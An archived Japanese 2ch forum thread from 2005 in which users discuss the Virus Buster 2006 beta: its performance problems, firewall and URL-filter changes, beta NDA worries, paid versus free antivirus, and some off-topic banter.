5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ウイルスバスター2006(仮称)ベータ版 Part1

1 :名無しさん@お腹いっぱい。:2005/09/17(土) 18:54:04
ウイルスバスタークラブ会員向けのダウンロード開始日10月20日以降は
仮称、ベータ版はずして、このまま正式スレに移行しましょう。
http://www.trendmicro.com/jp/products/vb2006.htm

2 :名無しさん@お腹いっぱい。:2005/09/17(土) 18:55:16
動作環境
Windows 98/98SE/Me:Pentium 233MHz以上(または互換プロセッサ)
Windows 2000 ProfessionalService Pack 4以上:Pentium 300MHz以上(または互換プロセッサ)
Windows XPHome Edition/ ProfessionalService Pack 1,2:Pentium 300MHz以上(または互換プロセッサ)

メモリ 128MB以上
ハードディスク 120MB以上のHDD空き容量
ディスプレイ 解像度800×600以上でHigh Color(65536色)以上をサポート
ソフトウェア Microsoft Internet Explorer 5.5 Service Pack 2 以上

3 :名無しさん@お腹いっぱい。:2005/09/17(土) 18:56:56
ベータ版入れてる人で、情報交換しましょう。
製品版発売から入れるユーザーにも役に立つでしょうから。

4 :名無しさん@お腹いっぱい。:2005/09/17(土) 19:21:36
とりあえず漏れの意見

普通に2005アンインスコして、2006インスコしたら、ネットにいっさい繋がんなくなって焦った。
理由は不明だが、もっかい2006アンインスして再インスコしたら、直った。

ネットしてると重い重い。
フィッシング詐欺対策ツールバーがIEに追加されたり
URLフィルタが強化?されてるらしく、それが原因か。
確実に2005より通常時は重いと思う。
PC立ち上げ時は変わらないと思う。

設定の場所が2005と若干違うのでメンドイ。
最初ネットに繋がんなかったし、ベータなんぞ入れなきゃ良かったと思ったが
いずれ入れなきゃならないわけだし同じかw

2005と違い、スパイウェアの監視対象がデフォですべてにチェック入ってる。

ウイルス警告発令時には(赤紙・ニョキのことと思われ)、すぐにうpでとする設定あり(選択可)
その時のうpでと中は他サイトへの接続を禁止もできる(選択可)

一回しかうpでとしてないので断言できないが
ダウソするファイルの容量が表示された気がしたよ。
親切っつったら、親切かも。

もれなく動画マニュアル付。HDDの消費容量が増えるだけw

偶数年は出来が良いという思い込みは、今回通用しない悪寒。
と予言で想像しておく。

5 :名無しさん@お腹いっぱい。:2005/09/17(土) 19:32:52
あと、おれの設定では
2005ではプログラムがネット接続する時、
ファイアウォールは接続先、ポートごとに、許可/不許可を聞いてきた。
2006ではプログラムごとの許可/不許可で
それも一回許可/不許可を選択すると、以後そのまんま。
変えたい場合は、ファイアウォールの設定を変更する必要があるようだ。

例として複数メールアカウント持ってるメーラーで、全アカウントのメール受信をした場合
2005はメアド4つなら4回許可かどうかを毎回聞いてきた。
2006は初めてメーラー起動させた時に許可/不許可を聞いてくるが、許可したら以後はなにも聞いてこない。
拒否したら、それっきりメール受信できません、ファイアウォールの設定を変更するまでは。

2006は初心者向けのような、そうでないような。
サポートに電話殺到しそう。


6 :名無しさん@お腹いっぱい。:2005/09/17(土) 20:45:53
フィッシング詐欺対策ツールバー重くて使えん
URLフィルタの注意画面が出てきてウザイ
アップデートさせるとZoneAlarmが反応
ZoneAlarmシステムエラー
anti-virus monitoring ON だと発生
anti-virus monitoring OFF で回避された


7 :名無しさん@お腹いっぱい。:2005/09/17(土) 20:47:34
>>6
PCのスペックは?

8 :名無しさん@お腹いっぱい。:2005/09/17(土) 21:00:52
>>6
禿同
P4-3G mem1G

9 :PenM 1.7G 512M XPSP2:2005/09/17(土) 21:06:09
URLフィルタが激重で使い物にならんな。

10 :名無しさん@お腹いっぱい。:2005/09/17(土) 21:24:24
アイコンがシンプルになったw
FirefoxもURLフィルター対応になった でも重い。
URLフィルター、スパイウエア監視を外せば2005と重さはあまり変わらない感じ。

11 :名無しさん@お腹いっぱい。:2005/09/17(土) 21:45:14
URLフィルタのカテゴリ制限って、
ページ開く度にトレンドのサーバ上のデータベースにアクセスしていたのか。
ちなみに、今鯖落ちてるっぽい?

12 :11:2005/09/17(土) 21:57:03
自己解決。
ブラウザのキャッシュクリアしたら治った。

13 :名無しさん@お腹いっぱい。:2005/09/17(土) 22:22:32
IEだけ劇重になった
Firefox、Operaは変わらず


14 :名無しさん@お腹いっぱい。:2005/09/17(土) 23:50:59
フィッシング対策バー消さないとIEは重すぎて使い物にならないね。
マシン:ダイナブクG6


15 :名無しさん@お腹いっぱい。:2005/09/18(日) 00:20:54
>>1 は通報されたりしないのだろうか。NDA的に大丈夫かこのスレ?

第5条 守秘義務
1. お客様は、(a)本契約記載の内容、および、(b)本契約に関連して知り得た情報(ライセンス製品のシリアル番号、
アクティベーションコード、レジストレーションキー、電話番号、ファックス番号、メールアドレス、URL、ID、パスワード
ならびにトレンドマイクロ株式会社からコンピュータネットワークを介して提供される情報内容を含みます)につき、
トレンドマイクロ株式会社の書面による承諾を得ることなく第三者に開示、漏洩しないものとし、かつ、本契約における
義務の履行または権利の行使に必要な場合を除き方法を問わず利用しないものとします。ただし、国家機関の命令による
開示等正当なる事由に基づき開示する場合はこの限りではありませんが、その場合にはトレンドマイクロ株式会社に対して
速やかに事前の通知を行うものとします。
2. 前項にかかわらず、以下各号に定める事項については前項の適用を受けないものとします。
(a) 開示を受けた時に既に公知である情報
(b) 開示を受けた後、自己の責によらず公知となった情報
(c) 開示を受ける前から、自己が適法に保有している情報
(d) 第三者から、守秘義務を負わず適法に入手した情報
(e) トレンドマイクロ株式会社の機密情報を使用または参照することなく独自に開発した情報
3. 前各項の規定は、本契約が解除、期間満了またはその他の事由によって終了したときであってもなおその効力を有するものとします。


16 :名無しさん@お腹いっぱい。:2005/09/18(日) 00:35:41
06βから06本物への移行はできるのだろうか?
いろいろ設定触って、アンインスコであぼーんでは困るのだが。

17 :名無しさん@お腹いっぱい。:2005/09/18(日) 01:03:09
みなさん人柱よろしくおながいします

18 :1:2005/09/18(日) 02:17:30
>>15
エエエエエ、ヤバァイのか?

一応、ダウソURLは載せなかったし
ここに書く情報は「(a) 開示を受けた時に既に公知である情報」であると思うから
大丈夫じゃないか?

なんか文句あったら、ひろゆきにIP聞いて
そのIPからベータダウソしたやつ割り出せると思うから(おれのISPでは、ひとりしかいねえだろ)
連絡してきてくれ。
スレあぼーんして、謝罪するから。
貧乏なので保証はできないが。

19 :名無しさん@お腹いっぱい。:2005/09/18(日) 06:28:47
まじ重い。
URLフィルタの有害サイト・サイトの種類(PC情報系だとかアイコンまで出る)の判定に
時間がかかってるらしい。
Microsoft Update以外のサイトはデフォルトでSleipnirが立ち上がるように切り替えたい。


20 :名無しさん@お腹いっぱい。:2005/09/18(日) 09:36:40
>>18
ベータ版の情報を正式DL開始日の〜10月20日に情報漏らすとヤバイと思う


21 :名無しさん@お腹いっぱい。:2005/09/18(日) 09:50:42
( ´,_ゝ`)

22 :名無しさん@お腹いっぱい。:2005/09/18(日) 13:01:24
ベータの情報なんてそこらのスレで書かれてる、何がヤバイのか解らん。
国内のソフトだからそんな反応なんだろか

23 :名無しさん@お腹いっぱい。:2005/09/18(日) 16:09:47
どっかの模造品お得意大国に漏れるとやばいからかな。

とか、適当に書いてみる。

24 :名無しさん@お腹いっぱい。:2005/09/18(日) 17:52:51
じゃ黙っとこう。

25 :名無しさん@お腹いっぱい。:2005/09/18(日) 22:36:04
アップデート対象のモジュールは2005と同じ?
http://pc8.2ch.net/test/read.cgi/sec/1125988152/17

26 :名無しさん@お腹いっぱい。:2005/09/19(月) 00:20:45
質問の意味がよくわからんが
2005から2006へプログラム本体がバージョンアップされてるんだから
うpでとファイルは同じでも、違うと言えるんじゃないか?

27 :名無しさん@お腹いっぱい。:2005/09/19(月) 00:58:48
>>1
アンケート回答時にトレンドマイクロに通報しといたよ
2chで機密情報をリークさせてる奴がいるって。

28 :名無しさん@お腹いっぱい。:2005/09/19(月) 01:09:27
>>27
はいはい、おやすみ〜

29 :名無しさん@お腹いっぱい。:2005/09/19(月) 17:42:18
ファイアウォールのアプリケーション接続検出で、
ハッシュのチェックもやるようになったね。
なりすまし防止とか。

30 :名無しさん@お腹いっぱい。:2005/09/20(火) 18:44:51
僕の成りすましを防止してください

31 :名無しさん@お腹いっぱい。:2005/09/20(火) 21:52:19
俺の成り上がりは止められないぜ

32 :名無しさん@お腹いっぱい。:2005/09/20(火) 22:44:01
迷惑メール対策ツールOE版インストールしたけど
最新版にUPDATEするのに5分ぐらい時間がかかって、ずっとCPUも100%なんだけど
これって当たり前?
当方CPU pen3 1B GHz です。

33 :名無しさん@お腹いっぱい。:2005/09/20(火) 22:59:34
>>32
あー、確かにアップデート中のダイアログが表示されてる間は、CPU100%になるねぇ。
でも、うちは放っておいたら45秒位経ってから勝手にダイアログが消えたし、以後は
CPUも通常値に戻ったけど。

メーカーに聞いてみれば?

34 :名無しさん@お腹いっぱい。:2005/09/20(火) 23:14:09
>>33
ではPCの性能が低いからですかね。
ダイアログが消えるとちゃんとCPU値の通常に戻ったので
ただインストールの時にやたら時間が掛かったもので

35 :名無しさん@お腹いっぱい。:2005/09/20(火) 23:25:33
>>32
OSはMS-Windows3.1、メモリは8MB
まで読んだ

36 :名無しさん@お腹いっぱい。:2005/09/21(水) 02:43:58
今までずっとこのソフトを使用していたのですが、フリーウェアと比べて有料なだけの仕事はしてくれるのでしょうか?
又、勝っている点は何でしょうか?
当方XPでny等の共有は一切しておりません。

宜しく御願いしますm(_ _)m

37 :名無しさん@お腹いっぱい。:2005/09/21(水) 03:57:55
>>36
新種ウイルスへの対応の早さ。
サポート情報の充実。
バグ取りの早さ。
万が一ウイルス感染しても、システムの修復能力の高さ。

大手3社はその点で合格。
信頼性が高い。
特にウイルスバスターは、システム修復能力に定評がある。
2002年から採用していた機能で、他社に先んじていた。
ノートンは2004年からだったし・・・。

38 :名無しさん@お腹いっぱい。:2005/09/21(水) 04:12:00
>>36
参考までに最近話題のキングについてセキュリティホールmemoの記事でも読んでみたら?
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2005/09.html#20050920__king

本来ウイルスの亜種の名前は末尾にAとかBとか命名されていたんだけれど、
最近のたちの悪いやつはそれがAA, ABとか2文字で命名されてしまうぐらい亜種が
大量に発見されていて、この記事で紹介されているSDBOTなんて多すぎてそれが
3文字になってる。
それだけ多い亜種に日々対応する必要があるわけで、フリーでやっているような会社
というのはどこからその人件費などを捻出してるのか謎。プロモーションを兼ねて無償配布
といっても、もはや限界だと思うんだがなぁ。


39 :名無しさん@お腹いっぱい。:2005/09/21(水) 04:21:19
それでいうと
フリー使うなら、海外のソフトで自国(地域)以外は無料ってやつか


40 :名無しさん@お腹いっぱい。:2005/09/21(水) 04:29:12
セキュリティ対策全般に対する防衛の範囲も違うね
フリーは機能としてウイルス検索とメール検索位しか無かったりするけど
バスター等は色々な機能で総合的なセキュリティ対策を確立しようとしている。

41 :名無しさん@お腹いっぱい。:2005/09/21(水) 09:49:48
NIS2005と比べて重さはどんなもんですか?

42 :名無しさん@お腹いっぱい。:2005/09/21(水) 13:14:48
まあ、有償バージョンと無償バージョンの両方を配布しているベンダーの場合、
有償バージョンで利益を得ているし、情報も充実してると思う。
ただし、無償には無償の理由がある。
サポートが無かったり、少なかったり・・・。

43 :名無しさん@お腹いっぱい。:2005/09/21(水) 13:40:19
36です。
皆さんレス有り難う御座居ました。・゜・(ノ∀`)・゜・。


私はパソ買う時に勧められたウィルスバスターをなんとなく使い続け4年位経っていたのですが、
メールも必要以外開かないし・共有等もしてなかったので、ウィルスには全くの無頓着でした(-Д-;)

>>38さんので、これを機に少し勉強してみます(`・ω・´)
あとウィルスバスターの更新もやっぱりしますw

44 :名無しさん@お腹いっぱい。:2005/09/21(水) 15:21:49
会員契約の更新は有料だが、
製品のバージョンアップは無料だね。
http://www.trendmicro.co.jp/download/

45 :名無しさん@お腹いっぱい。:2005/09/21(水) 17:16:21
何を今s

46 :名無しさん@お腹いっぱい。:2005/09/21(水) 18:10:30
>>44
数年バスターを使い続けてる人ばかりのスレで
何を今更言ってるのかな

それとも誤爆?

47 :名無しさん@お腹いっぱい。:2005/09/21(水) 22:35:51
昔βに参加したときは簡単なアンケートで謝礼は全員に2000円のクオカードだったと記憶してるけど、今年はなに?

48 :名無しさん@お腹いっぱい。:2005/09/21(水) 22:41:45
去年は謝礼なんて無かったお
今年は何かあるお?

49 :名無しさん@お腹いっぱい。:2005/09/21(水) 22:42:12
抽選ですが、かなりいいものが当たります。
さーて、アンケートに答えなくっちゃ。

50 :名無しさん@お腹いっぱい。:2005/09/21(水) 22:59:21
このベータ版はバスターユーザーは全員案内のメールは来るのだろうか?
それともある程度メーカーが選んで送ってるのだろうか?

51 :名無しさん@お腹いっぱい。:2005/09/21(水) 23:02:23
>>50
http://www.trendmicro.co.jp/support/news.asp?id=716

52 :名無しさん@お腹いっぱい。:2005/09/22(木) 09:24:06
ベータ版、やけに重いと思ったけど、
迷惑メールとかURLフィルタとかツールバーとか無効にしたら快適になったぞ


53 :名無しさん@お腹いっぱい。:2005/09/22(木) 09:35:48
そしたら機能的には2005とあまり変わらなくなっちゃうね

54 :名無しさん@お腹いっぱい。:2005/09/22(木) 13:40:01
実際、URLフィルターは重くてダメだべ。
パケットみてみたらデータベースサーバーみたいところに問い合わせにいってから、
行きたいURLを表示するっぽい。
一箇所のWebページに対して2度のアクセスがあるのだから、
重く感じるのも当然だわな。

55 :名無しさん@お腹いっぱい。:2005/09/22(木) 19:22:14
あれ、アンケート出したけど、
「アンケート調査報告ありがとうございました」的なメールとかきた?
ちゃんと向こうにとどいたのか不安だ

56 :名無しさん@お腹いっぱい。:2005/09/22(木) 20:26:59
>55
こなかったあ


57 :名無しさん@お腹いっぱい。:2005/09/22(木) 21:50:39
TMから人柱キボンのメールきたけど、入れた方がいいのかなあ?

58 :名無しさん@お腹いっぱい。:2005/09/22(木) 21:58:46
>>57
全ては自己責任で。メーカーもそう言ってるし。
発売前の新製品を先取りして悦に浸るにはイイぞ。

59 :名無しさん@お腹いっぱい。:2005/09/22(木) 22:55:56
>>58
d
2005の使用期限が5月まで残ってるけど、その前に2006に慣れておくのもよさげだな
使い倒すつもりでやってみます

60 :名無しさん@お腹いっぱい。:2005/09/22(木) 23:28:25
IEに合体するツールバーって、どういう機能があるのですか?
URLフィルターが重いってカキコが多いけど、VB2005のURLフィルターより重くなってるってことでつか?
URLフィルターはsleipnirでも使えますか?(VB2005はIEのみ可)

61 :名無しさん@お腹いっぱい。:2005/09/22(木) 23:40:04
現時点では、ブラウザが重くなるのはURLフィルタではなくて、
フィッシング詐欺対策ツールバーを有効にした時だな。

62 :名無しさん@お腹いっぱい。:2005/09/23(金) 01:36:50
フィッシング詐欺ツールバーを有効にしてもページ切り替えが重くならなくなった。

63 :名無しさん@お腹いっぱい。:2005/09/23(金) 01:45:10
>>62
え?どうして?

64 :名無しさん@お腹いっぱい。:2005/09/23(金) 01:54:35
多分PC買い替えた

65 :名無しさん@お腹いっぱい。:2005/09/23(金) 01:55:29
多分ISDNからFTTHに乗り換えた

66 :名無しさん@お腹いっぱい。:2005/09/23(金) 01:56:09
サーバのメンテかチューニングだろう。
製品版では快適に動作するようになるんだろうな。

67 :66:2005/09/23(金) 02:02:22
・・・製品の評価は、その製品が正式に発売されてからやった方がいいな
と思ったので、もう黙ります。

68 :名無しさん@お腹いっぱい。:2005/09/23(金) 04:23:16
アンケートの景品がまた電卓だったら怒るぞ

69 :トレンドマイクロの人:2005/09/23(金) 08:31:17
え、なんでわかったの?

70 :名無しさん@お腹いっぱい。:2005/09/23(金) 08:35:22
>>69
おまえはいつもツマンネ

71 :名無しさん@お腹いっぱい。:2005/09/23(金) 10:26:37
>>67
いや、黙らないでくれ。
ベータ版入れてない人が、いろいろとレポ楽しみに読んでるから。
俺だけど。

72 :名無しさん@お腹いっぱい。:2005/09/23(金) 15:37:38
>>71
>>15

>>66 の判断は正しいと思う

73 :71:2005/09/23(金) 15:56:53
>>72
あ、俺、2005ユーザーで、2006のメールも受け取っています。
そのまま製品版として使えない、というのが面倒で、入れ替えていません。(卑怯かな)

74 :名無しさん@お腹いっぱい。:2005/09/23(金) 16:14:25
OperaやFireFoxやSleipnirとかでもURLフィルタって使えるの?
あいかわらずIE専門店かいな。
来年あたりFireFox用スパイウェアが出るとかいう噂もあるけど…。

75 :名無しさん@お腹いっぱい。:2005/09/23(金) 16:38:10
Firefoxはやめておけ

シマンテック:「Mozillaブラウザの脆弱性、IEを上回る」
ttp://japan.cnet.com/news/sec/story/0,2000050480,20087325,00.htm

76 :Firefox使い:2005/09/23(金) 20:37:51
そうそう
Operaにしなさい
これ以上ユーザーが増えたらたまったもんじゃない

77 :名無しさん@お腹いっぱい。:2005/09/23(金) 23:09:05
36ですが

セキュリティ初心者ですみません。
>>44
会員契約の更新は有料だが、
製品のバージョンアップは無料だね。

会員だと何が違うのでしょうか?


78 :名無しさん@お腹いっぱい。:2005/09/23(金) 23:23:25
>>77
ヒント:メーカーのWebサイト

79 :名無しさん@お腹いっぱい。:2005/09/24(土) 00:01:24
適当に抜粋した


ウイルスバスタークラブ会員契約更新とは?

ウイルスバスタークラブ会員の初年度年会費は、製品のご購入代金に含まれておりますが、2年目以降も引き続きウイルスパターンファイルのアップデート等の会員特典をご利用いただくためには、会員契約を更新していただく必要があります。

※ 会員契約を更新されても、製品は自動的にアップグレードされません。


ウイルスバスタークラブ会員期間内で、ウイルスバスターの旧製品をお使いのお客さまは、新製品に無料でアップグレードすることができます。






80 :名無しさん@お腹いっぱい。:2005/09/24(土) 00:03:02
>>79
ここは2006ベータ版のスレだぞ

81 :名無しさん@お腹いっぱい。:2005/09/24(土) 01:15:11
なんかアップデートしても、セキュリティの緊急警告のアイコンが出っぱなしなんだが、みんなもそでつか?

82 :名無しさん@お腹いっぱい。:2005/09/24(土) 02:10:12
>>81
おれは違う
それこそサポートにいえ。
発売前のいまのうちなら、いい仕事したぞって>>81が誉められるかもしれない。

83 :名無しさん@お腹いっぱい。:2005/09/24(土) 02:46:55
2005ユーザーなんだけど、3週間ほど avast! + ZoneAlarmFree に浮気してる。

先日2006の案内が来て、ずっと悩んでる。

ベータ版入れるべきか?
リリースまで待つべきか?
このまま浮気を本気にしちゃうか?

84 :名無しさん@お腹いっぱい。:2005/09/24(土) 03:17:02
>>83
そんな貴方に
中国市場占拠率No.1総合セキュリティ対策ソフト
「キングソフトインターネットセキュリティ2006」(中国名「金山毒覇」)
ですよ。

85 :名無しさん@お腹いっぱい。:2005/09/24(土) 10:31:46
キングは山田や苺に対応してないからダメぽ

86 :83:2005/09/24(土) 11:30:01
>>84
国内で実績のないソフトを使うのは恐いね。

2006のURLフィルターはどう?
子供用にフィルタリングしたいんだけど、使えそうですか?

このスレには子持ちはいないかなぁ。

87 :名無しさん@お腹いっぱい。:2005/09/24(土) 11:46:08
2006のフィルタは知らんが子供(小学生)のパソコンではこれをホームに設定してる
http://kids.yahoo.co.jp/

88 :83:2005/09/24(土) 13:58:28
>>87
俺もそうしてる。

でも子どもってスゴイもので、いつの間にか検索して
いろんなサイトをお気に入りに保存してるのを見つけた。

恐くなったので、先日Java、JavaScript、ActiveXを全部オフりましたとさ。

89 :名無しさん@お腹いっぱい。:2005/09/24(土) 15:40:59
アダルトサイトのフィルタリングについては2005と同じじゃないかな?
フィルタリング対象に項目が3つ増えただけ(フィッシングサイトとか)

90 :名無しさん@お腹いっぱい。:2005/09/24(土) 15:48:40
バスターのフィルタリングはユーザーごとの設定ができないからなあ
別のフィルタリングソフトを使った方がいいと思う

91 :名無しさん@お腹いっぱい。:2005/09/24(土) 15:54:44
どうもベータテスターに対する謝礼が年々悪くなってるようだね
俺がベータテストした2000の時は、製品版の利用権が謝礼だったけど

92 :名無しさん@お腹いっぱい。:2005/09/24(土) 19:51:37
バグ取りのためにテスターの数を増やしてるんだろうな。
豪華謝礼じゃ破産するよw

93 :名無しさん@お腹いっぱい。:2005/09/24(土) 19:56:39

そんな貴方に
中国市場占拠率No.1総合セキュリティ対策ソフト
「キングソフトインターネットセキュリティ2006」(中国名「金山毒覇」)
サポート掲示板も充実してます。
公式HP
http://www.kingsoft.jp/

94 :名無しさん@お腹いっぱい。:2005/09/24(土) 20:13:29
>>91
Microsoftで言えば「Windowsの使用権」とか「Officeの使用権」か。
うはwwwwwwwwwww
金も払わずにwwwwww
豪華すぎるwwwwwwww

95 :名無しさん@お腹いっぱい。:2005/09/25(日) 12:27:50
昨日お誘いメールが来たので入れてみた
タスクトレイのアイコンがスッキリし過ぎ、リアルタイム検索OFFかと思った

96 :名無しさん@お腹いっぱい。:2005/09/25(日) 17:25:57
その後みなさんいかがお過ごしでしょうか?

何も出ない状態がベストなのが、セキュリティーソフトではありますが…。

97 :名無しさん@お腹いっぱい。:2005/09/25(日) 17:28:20
偶数バージョンはやっぱり安定してるのか?

98 :名無しさん@お腹いっぱい。:2005/09/25(日) 17:38:12
今のところ不具合は特に無いな。俺は、だが。
みなさんどうよ?

99 :名無しさん@お腹いっぱい。:2005/09/25(日) 18:12:33
2006も山田や苺やキンタマには対応しているよね?

100 :名無しさん@お腹いっぱい。:2005/09/25(日) 18:13:57
やっぱり俺も2006入れて見ようかなー。
うーん。うーん。面倒くせーなー。
どうしよーかなー。
うーん。

101 :名無しさん@お腹いっぱい。:2005/09/25(日) 18:37:23
不要な機能を全部オフしたら、2005になりました。

102 :名無しさん@お腹いっぱい。:2005/09/25(日) 19:03:27
>>101
2006の新機能はぜーんぶ不要なレベルってことなのかっ!
俺にとってもそうかもしれん。

103 :名無しさん@お腹いっぱい。:2005/09/25(日) 19:35:52
今日アンケートに答えてきた。メンドカッタ。
賞品当たれば苦労も報われるのだが。

104 :名無しさん@お腹いっぱい。:2005/09/25(日) 19:39:05
>>97-98
てかよ、2005の時もなんの問題もなかったけどな。
騒いでたのは一部の人間だろ。結局2006でも偶数バージョンでも一部の人間は騒ぐのさ。
(プログラム本体についてのみの話で、例の事件は除く)

105 :名無しさん@お腹いっぱい。:2005/09/25(日) 20:19:13
結局のところ、ウイルスソフトなんか入れない方がいいんだよ
俺みたいにな

106 :名無しさん@お腹いっぱい。:2005/09/25(日) 21:01:15
ゲイツ的に表現すると、「ウイルスバスター2005 2nd Edition」

107 :名無しさん@お腹いっぱい。:2005/09/25(日) 22:14:46
>>105
携帯からアクセスしてるオマイはそうだろうよ
ネットカフェからだったか?

108 :名無しさん@お腹いっぱい。:2005/09/25(日) 23:03:37
すみません
実はバスター2005入れています

109 :名無しさん@お腹いっぱい。:2005/09/26(月) 10:47:39
>>105
確かに、ウイルスソフトは入れない方がいいな・・・

110 :名無しさん@お腹いっぱい。:2005/09/26(月) 11:40:38
例の支邦ソフトか

111 :名無しさん@お腹いっぱい。:2005/09/26(月) 14:17:54
ウイルスソフトはいれずに
アンチウイルスソフトを入れるってことだろ


112 :名無しさん@お腹いっぱい。:2005/09/26(月) 14:48:34
2006β試しに入れました。
やはり余計な機能はすべてオフが幸せそうです。
今よく使うソフトで2006β入れたら不具合発生で問い合わせ中
ソフトの再インスコしても×
2005に戻したら大丈夫だったので。。。

113 :名無しさん@お腹いっぱい。:2005/09/26(月) 14:56:39
>>112
>今よく使うソフトで2006β入れたら不具合発生で問い合わせ中
詳しく。

114 :名無しさん@お腹いっぱい。:2005/09/26(月) 14:59:49
結局メーラがOEな俺は、迷惑メール対策ツールがかなり便利

115 :名無しさん@お腹いっぱい。:2005/09/26(月) 18:03:36
インターネット初めて8年になるが、迷惑メールが来たことは一度もない。どうやったら来るんだ?

116 :名無しさん@お腹いっぱい。:2005/09/26(月) 18:16:45
方々の掲示板やブログにメールアドレスを貼り付ける、とか?


117 :名無しさん@お腹いっぱい。:2005/09/26(月) 18:58:11
>>110
中国と台湾の区別も出来ない馬鹿ですか?
つか、社長がどうあれ、日本企業だし。

118 :名無しさん@お腹いっぱい。:2005/09/26(月) 23:36:16
>>117
(゚Д゚)ハァ?

119 :名無しさん@お腹いっぱい。:2005/09/27(火) 21:43:48 ID:0
やっぱり皆、一番のイベントだから、2006ダウソ開始日を心待ちにしてるのかな?
直後の数週間はスレが伸びて、そのあと平和になるまでが楽しい期間で。

120 :名無しさん@お腹いっぱい。:2005/09/27(火) 22:07:06 ID:0
むんむんたんも来てくれるかな?

121 :名無しさん@お腹いっぱい。:2005/09/28(水) 00:05:55
うーん、うーん。
継続して使えないと分かっているだけに、ベータ版を入れることに躊躇するなぁ。
設定情報を簡単に引き継げるツールを用意してくれよ>トレンドマイクロ

122 :名無しさん@お腹いっぱい。:2005/09/28(水) 00:39:01
>>121
なんのためのベータ版なんだよ
ようは研究室、動物実験、を経て、最終実験場である、臨床試験をやってるんだよ。
そんなツールあるわけねえだろ。
もし作るなら、2004製品版→2005製品版と、有料の製品版の設定情報を移すツールつくるほうが先だろ。

123 :名無しさんに接続中…:2005/09/28(水) 07:39:37
>121
パーソナルファイアウォールの設定し直すのが面倒だから
俺もツール欲しい。


124 :名無しさん@お腹いっぱい。:2005/09/28(水) 23:24:32
>>122
じゃ、そのツールのベータ版を同梱してくれよ>トレンドマイクロ

ううむ、さすがは大岡裁きじゃ。

125 :名無しさん@お腹いっぱい。:2005/09/28(水) 23:33:45
FWの設置引き継ぎもそうなんだが、
設定を初期化したり、ファイルに書き出したりする機能があるといい

一応、前バージョンの時に電話してそういう機能がないか聞いたら
無いと言うことだったので、2006に期待したが
ベータ版にはないなぁ


126 :名無しさん@お腹いっぱい。:2005/09/28(水) 23:40:49
機能や設定項目が複雑化しているから、そろそろそういう機能が欲しいよな。
アンケートには書いておこう。

127 :名無しさん@お腹いっぱい。:2005/09/29(木) 01:18:03
>>126
どんどん書いてくれ。

一部のデキルと思い込んでいる人は、自分と同じレベルを他人に要求する。
本当にデキル人は、理解できない人に理解させるだけのコミュニケーション能力を有す。

そして、できるだけ多くの初心者の意見をうまく反映することがメーカーの義務であり、信頼の証。

128 :名無しさん@お腹いっぱい。:2005/09/29(木) 02:55:47
でもまあ、そういうツールというか機能は無理だろうな。
バージョンがアップすると機能追加される場合が多いので
旧バージョン→最新バージョンでは意味がない。

しかし、2005→2005というような設定エクスポート機能はあってもいいと思うがなぁ。
OS再インスコ時に役に立つので。
それくらい、マジでやれよと言いたい。
ちょちょちょっとやるだけで、簡単だと思うがな。
アンケートの最後に書いておけば良かった(違うこと書いちゃった。2007では書こう)

129 :名無しさん@お腹いっぱい。:2005/09/29(木) 07:55:42
今からでも
「設定を元に戻す」とか
「エクスポート機能」を
つけてくれたらすごいよね

130 :名無しさん@お腹いっぱい。:2005/09/29(木) 10:30:30
新機能はもうつかないだろ。致命的なバグつぶしだけだよ。
2007に期待汁。

131 :名無しさん@お腹いっぱい。:2005/09/29(木) 17:03:59
トレンドマイクロはウイルス対策に特化した企業だったから、
ファイアウォール、侵入検知、迷惑メール対策、スパイウェア対策、有害サイト対策に関する技術が乏しかった。

まあ、ファイアウォールは数年前にCheckPointと業務提携してるけど、
企業向けの総合セキュリティ・モデルに採用されただけで、
自社技術の向上にはつながっていない。
契約上、他社の技術をそのまま使っただけだから。

でも今後は大きく変わるだろうな。
スパム対策会社、スパイウェア対策会社などを次々に買収してるし、
PFWの性能も2005バージョンから急激に向上した。
「ウイルス対策以外の機能はオマケに過ぎない」というイメージがそろそろ消えると思う。


132 :131:2005/09/29(木) 17:08:17
同じ買収劇でも、シマンテックやマカフィーのやり方は無駄が多い。
既に買収を繰り返して、巨大企業になったのに、その後も次々に買収を繰り返してるから、
吸収した技術を生かせなくなった。
マカフィーやノートンのスパム対策機能は、買収前のベンダー製品の性能を下回っているとよく指摘されている。

対するトレンドマイクロは、何も無かった部分に効率よく新技術を吸収しているから、
かなり成果が出ると予測される。


133 :名無しさん@お腹いっぱい。:2005/09/29(木) 18:00:33
こういう場合
社員乙
って書いとけばいいのか?

134 :131:2005/09/29(木) 20:11:27
>>133
脳内妄想はセキュリティ以前の問題じゃないのか?
俺、ラーメン板では○○店の店員乙とか、
文学板では○○出版社の工作員乙とか、
PC板ではIBM社員乙とか言われたなw

いやはや、2chには馬鹿が多いね。


135 :名無しさん@お腹いっぱい。:2005/09/29(木) 21:54:35
あまりにも偏った意見だと社員乙って思わなくても、変に見えてしまう。
スバラシイ、スバラシイ、でもここはダメだけどな、って書き込みなら、なるほどと思うが。

136 :名無しさん@お腹いっぱい。:2005/09/29(木) 23:06:27
>>134
それは、活字でモノを伝える能力に欠陥があるのではないか、とか考えた事ないか?
まぁいいけど。

137 :131:2005/09/29(木) 23:24:36
>>135
そんなに偏った意見か?
事実に基づいた見解なのだし。
毎回毎回「ここはいい」と「ここはダメ」を併記してたら長文になるだろ。

>>136
俺に限らず、2ちゃんではよく見かける煽りじゃん。
だからこそ「馬鹿が多い」と言ってんだよ。

138 :名無しさん@お腹いっぱい。:2005/09/29(木) 23:34:49
「○○乙」は枕詞みたいなもんで、いちいち反応する方がキモイ。
つーか、自分の主張が共感を得られなかった事を他人のせいにすんな。

139 :131:2005/09/29(木) 23:40:27
俺も普段はスルーしてるけど、たまに馬鹿をからかいたくなるわなw
つか、おまいらもいちいち反応してるじゃん。
特に>>138。そんなんでageる馬鹿だ。

140 :名無しさん@お腹いっぱい。:2005/09/29(木) 23:42:16
共感は別にしても、今後は機能が充実すると思うよ。
そのための投資だろうし・・・。

141 :名無しさん@お腹いっぱい。:2005/09/29(木) 23:47:52
漏れのチンコをバスターしてください。
悪いやつなんです。

142 :名無しさん@お腹いっぱい。:2005/09/29(木) 23:52:22
Windows自体も、ファイヤウォールやアンチスパイウェアやらアンチウイルスなんか
どんどん機能が膨らんで、将来は本当の意味でのオールインワンみたくなると思う。
ソフトウェア会社はいかに真っ黒ソフトと差別化を図るかが問題になってくるんだろうね。
雑誌やなんかがちょっと取り上げると結構売れるんだよね。
今後は各種メディアなんかを味方につけて行く必要があるんじゃないかな。

あ、長文スマソ。

